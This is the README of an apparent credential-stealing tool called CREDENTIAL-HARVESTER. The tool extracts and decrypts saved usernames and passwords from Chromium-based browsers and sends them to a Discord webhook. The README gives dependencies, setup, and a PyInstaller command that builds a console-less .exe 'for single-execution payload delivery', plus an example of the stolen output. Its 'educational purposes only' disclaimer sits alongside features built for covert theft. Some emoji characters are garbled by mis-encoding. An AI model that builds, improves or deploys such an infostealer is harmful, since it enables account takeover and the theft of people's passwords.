This project is a Python-based tool designed to extract saved credentials (username and password) from Chromium-based browsers like Google Chrome, Microsoft Edge, and Brave. The extracted data is sent securely to a Discord Webhook for remote access and monitoring (for educational and ethical hacking purposes only).
- π Automatically locates user profiles from Chromium-based browsers.
- π Decrypts saved passwords using the system's encryption key.
- π€ Sends the credentials to a configured Discord Webhook.
- π Outputs logs and status updates for troubleshooting.
- βοΈ Can be compiled into
.exefor single-execution payload delivery.
This project is for educational purposes and ethical hacking only.
Unauthorized use of this tool on systems you do not own or have permission to test is illegal.
- Python 3.8+
- Windows OS
- The following Python packages:
pycryptodomepywin32requests
Install dependencies:
pip install -r requirements.txtπ¦ Build to EXE
To generate a .exe version using PyInstaller:
pyinstaller --noconsole --onefile main.pyπ§ Usage
Clone or download the repository.
Set your Discord Webhook in main.py (replace PUT YOUR WEBHOOK with your actual Discord webhook URL).
Run the script:
python main.pyExample Output (Discord):
--- [Brave (Default)] ---
URL: https://example.com/login
Username: example@gmail.com
Password: MySecurePass123
Project Structure:
CREDENTIAL-HARVESTER/
βββ main.py
βββ requirements.txt
βββ README.md
βββ Result.txt (auto-generated)